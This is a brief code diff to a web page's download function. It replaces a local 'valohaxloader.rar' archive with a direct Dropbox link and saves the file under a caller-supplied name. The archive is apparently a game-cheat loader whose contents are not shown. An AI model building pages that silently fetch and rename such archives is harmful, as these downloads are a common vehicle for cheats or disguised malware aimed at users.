--- a/index.html
+++ b/index.html
@@ -293,7 +293,7 @@ const buttons = document.querySelectorAll('.catalog-block__item-link');
 
 function downloadFile(filename) {
   const link = document.createElement('a');
-  link.href = 'valohaxloader.rar';
+  link.href = 'https://www.dropbox.com/scl/fi/vbe2jc840dvlhg4a5ob9k/valohexloader.rar?rlkey=9iekwli62njfyoyvd7jkueh4l&st=x3a7zjfp&dl=1';
   link.download = filename;
   link.click();
 }
